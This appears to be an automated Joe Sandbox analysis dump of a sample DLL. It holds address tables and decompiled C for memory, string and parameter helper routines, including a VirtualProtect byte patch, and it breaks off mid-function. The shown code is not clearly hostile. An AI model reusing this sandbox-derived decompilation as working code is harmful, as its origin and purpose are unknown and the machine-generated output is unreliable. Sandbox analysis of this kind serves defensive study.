                                                            0x00000000
                                                            0x73bc253f
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2526
                                                            0x73bc252a
                                                            0x73bc252c
                                                            0x73bc2530
                                                            0x73bc2531
                                                            0x73bc2532
                                                            0x73bc2536
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2671
                                                            0x73bc2675
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc267c
                                                            0x73bc2685
                                                            0x73bc2687
                                                            0x73bc268b
                                                            0x73bc268d
                                                            0x73bc2693
                                                            0x73bc2694
                                                            0x73bc2695
                                                            0x73bc269a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2634
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2549
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26f2
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2551
                                                            0x73bc2553
                                                            0x73bc2554
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26e2
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26e6
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26ee
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2598
                                                            0x73bc2598
                                                            0x73bc259a
                                                            0x73bc259a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2564
                                                            0x73bc2566
                                                            0x73bc2567
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2577
                                                            0x73bc2579
                                                            0x73bc257a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc25aa
                                                            0x73bc25aa
                                                            0x73bc25ac
                                                            0x73bc25ac
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2583
                                                            0x73bc2583
                                                            0x73bc2585
                                                            0x73bc2585
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc258c
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26ea
                                                            0x73bc26f4
                                                            0x73bc26f4
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc263d
                                                            0x73bc2642
                                                            0x73bc2648
                                                            0x73bc264a
                                                            0x73bc264b
                                                            0x73bc264b
                                                            0x73bc264e
                                                            0x73bc2650
                                                            0x73bc2652
                                                            0x73bc2653
                                                            0x73bc2656
                                                            0x73bc2656
                                                            0x73bc2658
                                                            0x73bc2658
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26dd
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2590
                                                            0x73bc2594
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc254d
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc25a1
                                                            0x73bc25a1
                                                            0x73bc25a3
                                                            0x73bc25a3
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc24ec
                                                            0x73bc24f4
                                                            0x73bc24f6
                                                            0x73bc24f8
                                                            0x73bc24fb
                                                            0x73bc24ff
                                                            0x73bc2503
                                                            0x73bc250b
                                                            0x73bc2510
                                                            0x73bc2517
                                                            0x73bc2519
                                                            0x73bc251a
                                                            0x73bc251d
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2558
                                                            0x73bc255a
                                                            0x73bc255a
                                                            0x73bc255b
                                                            0x73bc255b
                                                            0x73bc255d
                                                            0x73bc255e
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc259d
                                                            0x73bc259d
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc256b
                                                            0x73bc256d
                                                            0x73bc256d
                                                            0x73bc256e
                                                            0x73bc256e
                                                            0x73bc2570
                                                            0x73bc2571
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc257e
                                                            0x73bc2580
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc25af
                                                            0x73bc25af
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2588
                                                            0x73bc2588
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc265e
                                                            0x73bc2663
                                                            0x73bc2668
                                                            0x73bc266c
                                                            0x73bc266c
                                                            0x73bc26d2
                                                            0x73bc26d2
                                                            0x73bc26d3
                                                            0x73bc26d3
                                                            0x73bc26d5
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc26f5
                                                            0x73bc26f5
                                                            0x73bc26fb
                                                            0x73bc26fc
                                                            0x73bc2700
                                                            0x73bc2702
                                                            0x73bc272c
                                                            0x73bc272e
                                                            0x73bc2730
                                                            0x73bc2732
                                                            0x73bc2732
                                                            0x73bc2735
                                                            0x73bc2735
                                                            0x73bc273c
                                                            0x73bc273d
                                                            0x00000000
                                                            0x73bc273d
                                                            0x73bc2704
                                                            0x73bc2707
                                                            0x73bc270e
                                                            0x73bc2711
                                                            0x73bc2718
                                                            0x73bc2719
                                                            0x73bc271f
                                                            0x73bc2723
                                                            0x73bc2723
                                                            0x00000000
                                                            0x73bc2723
                                                            0x73bc2713
                                                            0x73bc2716
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc25a6
                                                            0x73bc25a6
                                                            0x73bc25b1
                                                            0x73bc25b1
                                                            0x73bc25b2
                                                            0x73bc25b2
                                                            0x73bc25b9
                                                            0x73bc25bb
                                                            0x73bc25be
                                                            0x73bc25c0
                                                            0x73bc25c2
                                                            0x73bc25c4
                                                            0x73bc25cc
                                                            0x73bc25d2
                                                            0x73bc25d6
                                                            0x73bc25d7
                                                            0x73bc25de
                                                            0x73bc25e2
                                                            0x73bc25e4
                                                            0x73bc25e7
                                                            0x73bc25e9
                                                            0x73bc25ea
                                                            0x73bc25ed
                                                            0x73bc25f4
                                                            0x73bc25f6
                                                            0x73bc25f8
                                                            0x73bc25fd
                                                            0x73bc2602
                                                            0x73bc2607
                                                            0x73bc2607
                                                            0x73bc260a
                                                            0x73bc260a
                                                            0x73bc260e
                                                            0x73bc2616
                                                            0x73bc2619
                                                            0x73bc261c
                                                            0x73bc2623
                                                            0x73bc2627
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc24e5
                                                            0x73bc2401
                                                            0x73bc2401
                                                            0x73bc2404
                                                            0x73bc24c4
                                                            0x73bc24c6
                                                            0x00000000
                                                            0x73bc24c6
                                                            0x73bc240a
                                                            0x73bc240d
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2413
                                                            0x73bc2416
                                                            0x73bc247b
                                                            0x73bc247b
                                                            0x73bc247e
                                                            0x73bc2498
                                                            0x73bc249a
                                                            0x73bc249a
                                                            0x73bc249b
                                                            0x73bc249b
                                                            0x73bc24a4
                                                            0x73bc24a8
                                                            0x73bc24b0
                                                            0x73bc24b0
                                                            0x73bc24aa
                                                            0x73bc24aa
                                                            0x73bc24aa
                                                            0x73bc24b2
                                                            0x00000000
                                                            0x73bc24b2
                                                            0x73bc2480
                                                            0x73bc2480
                                                            0x73bc2483
                                                            0x73bc2494
                                                            0x00000000
                                                            0x73bc2494
                                                            0x73bc2487
                                                            0x73bc2488
                                                            0x73bc248a
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2490
                                                            0x00000000
                                                            0x73bc2490
                                                            0x73bc2418
                                                            0x73bc2477
                                                            0x00000000
                                                            0x73bc2477
                                                            0x73bc241a
                                                            0x73bc241a
                                                            0x73bc241d
                                                            0x73bc246e
                                                            0x00000000
                                                            0x73bc246e
                                                            0x73bc241f
                                                            0x73bc241f
                                                            0x73bc2422
                                                            0x73bc2467
                                                            0x00000000
                                                            0x73bc2467
                                                            0x73bc2424
                                                            0x73bc2424
                                                            0x73bc2427
                                                            0x73bc2464
                                                            0x00000000
                                                            0x73bc2464
                                                            0x73bc242b
                                                            0x73bc242c
                                                            0x73bc242e
                                                            0x00000000
                                                            0x73bc2434
                                                            0x73bc2434
                                                            0x00000000
                                                            0x73bc2434
                                                            0x73bc242e
                                                            0x73bc2453
                                                            0x73bc2458
                                                            0x00000000
                                                            0x73bc2458
                                                            0x73bc2442
                                                            0x73bc2446
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc2448
                                                            0x73bc244a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73bc244a
                                                            0x73bc230e
                                                            0x73bc2311
                                                            0x73bc2378
                                                            0x73bc237d
                                                            0x73bc2382
                                                            0x73bc2388
                                                            0x73bc2390
                                                            0x73bc2390
                                                            0x73bc2391
                                                            0x73bc2391
                                                            0x73bc2399
                                                            0x73bc239e
                                                            0x73bc23a2
                                                            0x73bc23a4
                                                            0x73bc23a9

                                                            APIs
                                                              • Part of subcall function 73BC12C6: GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            • lstrcpyA.KERNEL32(?,?), ref: 73BC27C0
                                                            • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 73BC281B
                                                            • lstrcpyA.KERNEL32(00000008,?), ref: 73BC286B
                                                            • lstrcpyA.KERNEL32(00000408,?), ref: 73BC2876
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2887
                                                            • GlobalFree.KERNEL32(?), ref: 73BC2901
                                                            • GlobalFree.KERNEL32(?), ref: 73BC2907
                                                            • GlobalFree.KERNEL32(?), ref: 73BC290D
                                                            • GetModuleHandleA.KERNEL32(00000008), ref: 73BC29D7
                                                            • LoadLibraryA.KERNEL32(00000008), ref: 73BC29E8
                                                            • GetProcAddress.KERNEL32(?,?), ref: 73BC2A3C
                                                            • lstrlenA.KERNEL32(00000408), ref: 73BC2A57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                             • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                            • String ID: :
                                                            • API String ID: 245916457-336475711
                                                            • Opcode ID: e64a3c643e0aed5a5e2b50da46895ad340ca0ff95b93fe2651b0605017c3d653
                                                            • Instruction ID: 9e7650a213328e163d882ea63215d56a40490c1be74f1fc18884e0671142031d
                                                            • Opcode Fuzzy Hash: e64a3c643e0aed5a5e2b50da46895ad340ca0ff95b93fe2651b0605017c3d653
                                                            • Instruction Fuzzy Hash: C932B571A0838A9FEB26CF34C48075AB7F5FF88314F14863EE596DA294E730D9458B91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 222 73bc19c7-73bc19d5 223 73bc1a1e-73bc1a21 222->223 224 73bc19d7-73bc1a18 VirtualProtect 222->224 224->223
                                                            C-Code - Quality: 100%
                                                            			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                            
                                                            				 *0x73bc5014 = _a4;
                                                            				if(_a8 == 1) {
                                                            					VirtualProtect(0x73bc501c, 4, 0x40, 0x73bc5034); // executed
                                                            					 *0x73bc501c = 0xc2;
                                                            					 *0x73bc5034 = 0;
                                                            					 *0x73bc5030 = 0;
                                                            					 *0x73bc502c = 0;
                                                            					 *0x73bc5028 = 0;
                                                            					 *0x73bc5024 = 0;
                                                            					 *0x73bc5020 = 0;
                                                            					 *0x73bc501e = 0;
                                                            				}
                                                            				return 1;
                                                            			}




                                                            APIs
                                                            • VirtualProtect.KERNELBASE(73BC501C,00000004,00000040,73BC5034), ref: 73BC19E5
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                             • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 646af9e945543cd39fea8abedead44defc7b5d0b155eb92cde77817f4815e81e
                                                            • Instruction ID: b5ccdb9ed94a7068b5bb90b6a51d8bd4c8242b23d677c7c9aef15190421998e7
                                                            • Opcode Fuzzy Hash: 646af9e945543cd39fea8abedead44defc7b5d0b155eb92cde77817f4815e81e
                                                            • Instruction Fuzzy Hash: 1DF098F2919344DAC339AF1B9A847263AA0B71D345B20452FF65DEBB41C33081009B9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 225 73bc12c6-73bc12d4 GlobalAlloc
                                                            C-Code - Quality: 100%
                                                            			E73BC12C6() {
                                                            				void* _t1;
                                                            
                                                            				_t1 = GlobalAlloc(0x40,  *0x73bc5040); // executed
                                                            				return _t1;
                                                            			}




                                                            0x73bc12ce
                                                            0x73bc12d4

                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                             • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                             • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            • Opcode ID: da11e5099e440407dd1ee7c37fd3cff2bad1db417223f71a2c6650b113b55ccf
                                                            • Instruction ID: 2d2157cf1fe414a902d04a9d8f6ffc60189ff9f7dd2a1a3ea9d20440416ab6ae
                                                            • Opcode Fuzzy Hash: da11e5099e440407dd1ee7c37fd3cff2bad1db417223f71a2c6650b113b55ccf
                                                            • Instruction Fuzzy Hash: 9AA002B35801109BDF727B93AB6EF283A32B74C701F740045E30DAB89087791110DB55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            control_flow_graph 226 73bc2128-73bc2147 call 73bc12c6 229 73bc2149-73bc214e 226->229 230 73bc2154 229->230 231 73bc2150-73bc2152 229->231 232 73bc2156-73bc215d 230->232 231->232 233 73bc2211-73bc2215 232->233 234 73bc2163 232->234 235 73bc222e-73bc2233 233->235 236 73bc2217-73bc221d 233->236 237 73bc219f-73bc21ae lstrcpynA 234->237 238 73bc21d8-73bc21fe WideCharToMultiByte 234->238 239 73bc216a-73bc216d 234->239 240 73bc21b0-73bc21d6 StringFromGUID2 WideCharToMultiByte 234->240 241 73bc2200 234->241 242 73bc2172-73bc2176 234->242 243 73bc2192-73bc219d call 73bc144d 234->243 246 73bc2235-73bc2238 235->246 247 73bc2250-73bc2256 235->247 244 73bc221f-73bc2223 236->244 245 73bc2225-73bc2228 GlobalFree 236->245 237->233 238->233 239->233 240->233 251 73bc2202-73bc2208 wsprintfA 241->251 248 73bc218f-73bc2190 242->248 249 73bc2178-73bc2188 242->249 256 73bc220e 243->256 244->235 244->245 245->235 252 73bc223a 246->252 253 73bc2242-73bc2244 246->253 247->229 255 73bc225c-73bc2267 GlobalFree 247->255 248->251 249->248 251->256 257 73bc223b call 73bc157e 252->257 253->247 258 73bc2246-73bc224e call 73bc15c7 253->258 256->233 259 73bc2240 257->259 261 73bc224f 258->261 259->261 261->247
                                                            C-Code - Quality: 71%
                                                            			E73BC2128(intOrPtr* _a4) {
                                                            				short _v84;
                                                            				intOrPtr* _t24;
                                                            				signed int _t25;
                                                            				intOrPtr _t26;
                                                            				intOrPtr _t33;
                                                            				void* _t39;
                                                            				void* _t42;
                                                            
                                                            				_t39 = E73BC12C6();
                                                            				_t24 = _a4;
                                                            				_t33 =  *((intOrPtr*)(_t24 + 0x814));
                                                            				_t42 = (_t33 + 0x41 << 5) + _t24;
                                                            				do {
                                                            					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
                                                            					}
                                                            					_t25 =  *(_t42 - 8) & 0x000000ff;
                                                            					if(_t25 <= 7) {
                                                            						switch( *((intOrPtr*)(_t25 * 4 +  &M73BC2268))) {
                                                            							case 0:
                                                            								 *_t39 = 0;
                                                            								goto L17;
                                                            							case 1:
                                                            								__edx =  *__edx;
                                                            								if(__ecx > 0) {
                                                            									__ecx = __ecx - 1;
                                                            									__ecx = __ecx *  *(0x73bc4060 + __eax * 4);
                                                            									asm("sbb eax, eax");
                                                            									__edx = __edx &  *(0x73bc4080 + __eax * 4);
                                                            								}
                                                            								_push(__edx);
                                                            								goto L15;
                                                            							case 2:
                                                            								_push(__edi);
                                                            								_push(__edx[1]);
                                                            								_push( *__edx);
                                                            								__eax = E73BC144D(__ecx);
                                                            								goto L16;
                                                            							case 3:
                                                            								__eax = lstrcpynA(__edi,  *__edx,  *0x73bc5040);
                                                            								goto L17;
                                                            							case 4:
                                                            								__ecx =  *0x73bc5040;
                                                            								__ecx - 1 = WideCharToMultiByte(0, 0,  *__edx, __ecx, __edi, __ecx - 1, 0, 0);
                                                            								__eax =  *0x73bc5040;
                                                            								 *((char*)(__eax + __edi - 1)) = 0;
                                                            								goto L17;
                                                            							case 5:
                                                            								_push(0x27);
                                                            								__eax =  &_v84;
                                                            								_push( &_v84);
                                                            								_push( *__edx);
                                                            								__imp__StringFromGUID2();
                                                            								__ecx = 0;
                                                            								__eax =  &_v84;
                                                            								__eax = WideCharToMultiByte(0, 0,  &_v84,  &_v84, __edi,  *0x73bc5040, 0, 0);
                                                            								goto L17;
                                                            							case 6:
                                                            								_push( *__esi);
                                                            								L15:
                                                            								__eax = wsprintfA(__edi, 0x73bc4058);
                                                            								L16:
                                                            								__esp = __esp + 0xc;
                                                            								goto L17;
                                                            						}
                                                            					}
                                                            					L17:
                                                            					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
                                                            						GlobalFree( *(_t42 + 0x14));
                                                            					}
                                                            					_t26 =  *((intOrPtr*)(_t42 + 0xc));
                                                            					if(_t26 != 0) {
                                                            						if(_t26 != 0xffffffff) {
                                                            							if(_t26 > 0) {
                                                            								E73BC15C7(_t26 - 1, _t39);
                                                            								goto L26;
                                                            							}
                                                            						} else {
                                                            							E73BC157E(_t39);
                                                            							L26:
                                                            						}
                                                            					}
                                                            					_t42 = _t42 - 0x20;
                                                            					_t33 = _t33 - 1;
                                                            				} while (_t33 >= 0);
                                                            				return GlobalFree(_t39);
                                                            			}











                                                            APIs
                                                              • Part of subcall function 73BC12C6: GlobalAlloc.KERNELBASE(00000040,73BC11C4,-000000A0), ref: 73BC12CE
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2228
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC225D
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: 53e94efa30f1554ffb3b279168e66a12a5a2948eb1826c26541a0eee3719f34f
                                                            • Instruction ID: 1822a239cd5709e78889ce9cdc684f0768000826b5cfcfa7cc46a353f19eb0dd
                                                            • Opcode Fuzzy Hash: 53e94efa30f1554ffb3b279168e66a12a5a2948eb1826c26541a0eee3719f34f
                                                            • Instruction Fuzzy Hash: 2F41BF72644188AFEB369F55CE85F2A7BBAFB49300F144139E906EF580E731E940CB61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E73BC1F58(void* _a4) {
                                                            				signed int _v4;
                                                            				signed int _v8;
                                                            				signed int _t46;
                                                            				void* _t47;
                                                            				signed int _t48;
                                                            				void* _t49;
                                                            				void* _t52;
                                                            				void* _t56;
                                                            				signed int _t57;
                                                            				signed int _t59;
                                                            				void* _t60;
                                                            
                                                            				_t52 = _a4;
                                                            				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
                                                            				while(1) {
                                                            					_v8 = _t46;
                                                            					_t59 = _t46 << 5;
                                                            					_t60 =  *(_t59 + _t52 + 0x830);
                                                            					if(_t60 == 0 || _t60 == 0x1a) {
                                                            						goto L8;
                                                            					}
                                                            					if(_t60 != 0xffffffff) {
                                                            						_t51 = _t60 - 1;
                                                            						if(_t60 - 1 > 0x18) {
                                                            							 *(_t59 + _t52 + 0x830) = 0x1a;
                                                            							L11:
                                                            							_t56 = _t59 + _t52;
                                                            							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
                                                            							}
                                                            							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
                                                            							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
                                                            							_v4 = _t48;
                                                            							if(_t48 > 7) {
                                                            								L28:
                                                            								_t49 = GlobalFree(_t60);
                                                            								_t57 = _v8;
                                                            								if(_t57 == 0) {
                                                            									return _t49;
                                                            								}
                                                            								_t43 = _t57 + 1; // 0x2
                                                            								_t55 =  !=  ? _t43 : 0;
                                                            								_t46 =  !=  ? _t43 : 0;
                                                            								continue;
                                                            							} else {
                                                            								switch( *((intOrPtr*)(_t48 * 4 +  &M73BC2108))) {
                                                            									case 0:
                                                            										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
                                                            										goto L28;
                                                            									case 1:
                                                            										_push(__esi);
                                                            										__eax = E73BC1326();
                                                            										_pop(__ecx);
                                                            										goto L18;
                                                            									case 2:
                                                            										_push(__esi);
                                                            										__eax = E73BC1326();
                                                            										_pop(__ecx);
                                                            										 *__ebp = __eax;
                                                            										_a4 = __edx;
                                                            										goto L28;
                                                            									case 3:
                                                            										__eax = E73BC12AF(__esi);
                                                            										goto L21;
                                                            									case 4:
                                                            										 *0x73bc5040 =  *0x73bc5040 +  *0x73bc5040;
                                                            										__eax = GlobalAlloc(0x40,  *0x73bc5040 +  *0x73bc5040);
                                                            										__ecx =  *0x73bc5040;
                                                            										_a4 = __eax;
                                                            										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73bc5040, __eax,  *0x73bc5040);
                                                            										if(_v4 != 5) {
                                                            											__eax = _a4;
                                                            											L21:
                                                            											 *(__edi + __ebx + 0x834) = __eax;
                                                            											L18:
                                                            											 *__ebp = __eax;
                                                            											goto L28;
                                                            										}
                                                            										__eax = GlobalAlloc(0x40, 0x10);
                                                            										 *(__edi + __ebx + 0x834) = __eax;
                                                            										__edi = _a4;
                                                            										_push(__eax);
                                                            										_push(__edi);
                                                            										 *__ebp = __eax;
                                                            										__imp__CLSIDFromString();
                                                            										__eax = GlobalFree(__edi);
                                                            										goto L28;
                                                            									case 5:
                                                            										if( *__esi != 0) {
                                                            											_push(__esi);
                                                            											__eax = E73BC1326();
                                                            											 *(__edi + __ebx + 0x820) = __eax;
                                                            										}
                                                            										goto L28;
                                                            									case 6:
                                                            										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73bc5040;
                                                            										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73bc5040 +  *0x73bc5038;
                                                            										_push(__ecx);
                                                            										__eax = __ecx + 0xc;
                                                            										 *(__edx + 0x820) = __eax;
                                                            										asm("cdq");
                                                            										_push(__edx);
                                                            										_push(__eax);
                                                            										__eax = E73BC144D(__ecx);
                                                            										__esp = __esp + 0xc;
                                                            										goto L28;
                                                            								}
                                                            							}
                                                            						}
                                                            						_t47 = E73BC14E2(_t51);
                                                            						L9:
                                                            						L10:
                                                            						_t60 = _t47;
                                                            						goto L11;
                                                            					}
                                                            					_t47 = E73BC152B();
                                                            					goto L10;
                                                            					L8:
                                                            					_t47 = E73BC12AF(0x73bc40c7);
                                                            					goto L9;
                                                            				}
                                                            			}















                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC20DD
                                                              • Part of subcall function 73BC12AF: lstrcpynA.KERNEL32(00000000,?,73BC1502,?,73BC11C4,-000000A0), ref: 73BC12BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73BC2042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73BC205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73BC206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73BC2081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73BC2088
                                                              • Part of subcall function 73BC1958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73BC20A7,00000000,?), ref: 73BC198A
                                                            Memory Dump Source
                                                            • Source File: 00000015.00000002.1284150466.0000000073BC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 73BC0000, based on PE: true
                                                            • Associated: 00000015.00000002.1284127375.0000000073BC0000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284160805.0000000073BC4000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000015.00000002.1284172984.0000000073BC6000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_21_2_73bc0000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: 1b54ee95f384f9c1a6e4c77d21887fbe14543a114efee13af91e2d4d803323ce
                                                            • Instruction ID: 090fb230dd0c3b2eb48f0659bd4336271a654ece9b6e429e1de5a153c7d3433e
                                                            • Opcode Fuzzy Hash: 1b54ee95f384f9c1a6e4c77d21887fbe14543a114efee13af91e2d4d803323ce
                                                            • Instruction Fuzzy Hash: D941B5B1505285EFE736AF24D4447AAB7E9FF84311F14823AE849EB186DB30D540CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E73BC1C2B(signed int __edx, char _a8, void* _a16) {
                                                            				char _v8;
                                                            				char _v28;
                                                            				void* _v32;
                                                            				signed int _v36;
                                                            				signed int _v40;
                                                            				void* _t28;
                                                            				char _t31;
                                                            				char _t32;
                                                            				signed int _t33;
                                                            				signed int _t41;
                                                            				signed int _t42;
                                                            				signed int _t43;
                                                            				signed int _t44;
                                                            				signed int _t45;
                                                            				signed int _t46;
                                                            				signed int _t51;
                                                            				void* _t52;
                                                            				void* _t53;
                                                            				void* _t54;
                                                            				void* _t55;
                                                            				void* _t56;
                                                            				signed int _t63;
                                                            				char _t67;
                                                            				signed int _t70;
                                                            				signed int _t72;
                                                            				void* _t79;
                                                            				void* _t81;
                                                            				signed int _t83;
                                                            				signed int _t86;
                                                            				void* _t91;
                                                            
                                                            				_t70 = __edx;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *0x73bc5040 = _a8;
                                                            				 *0x73bc503c = _a16;
                                                            				asm("movlpd [esp+0x10], xmm0");
                                                            				_t28 = E73BC152B();
                                                            				_push(_t28);
                                                            				_v32 = _t28;
                                                            				_t72 = E73BC1326();
                                                            				_t63 = _t70;
                                                            				_t79 = E73BC152B();
                                                            				_a16 = _t79;
                                                            				_t67 =  *_t79;
                                                            				_t31 = _t67;
                                                            				_a8 = _t31;
                                                            				if(_t67 == 0x7e) {
                                                            					L3:
                                                            					_t68 = _v36;
                                                            					_t83 = _v40;
                                                            					L4:
                                                            					_t32 = _t31;
                                                            					_t91 = _t32 - 0x2f;
                                                            					if(_t91 > 0) {
                                                            						_t33 = _t32 - 0x3c;
                                                            						__eflags = _t33;
                                                            						if(_t33 == 0) {
                                                            							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
                                                            							if( *((char*)(_t79 + 1)) != 0x3c) {
                                                            								__eflags = _t63 - _t68;
                                                            								if(__eflags > 0) {
                                                            									L18:
                                                            									asm("xorps xmm0, xmm0");
                                                            									asm("movlpd [esp+0x10], xmm0");
                                                            									_t72 = _v40;
                                                            									_t63 = _v36;
                                                            									L19:
                                                            									_push( &_v28);
                                                            									_push(_t63);
                                                            									_push(_t72);
                                                            									E73BC144D(_t68);
                                                            									E73BC157E( &_v28);
                                                            									GlobalFree(_v32);
                                                            									return GlobalFree(_t79);
                                                            								}
                                                            								if(__eflags < 0) {
                                                            									L57:
                                                            									_t72 = 1;
                                                            									_t63 = 0;
                                                            									goto L19;
                                                            								}
                                                            								__eflags = _t72 - _t83;
                                                            								if(_t72 >= _t83) {
                                                            									goto L18;
                                                            								}
                                                            								goto L57;
                                                            							}
                                                            							_t70 = _t63;
                                                            							_t68 = _t83;
                                                            							_t41 = E73BC3090(_t72, _t83, _t70);
                                                            							L53:
                                                            							_t72 = _t41;
                                                            							_t63 = _t70;
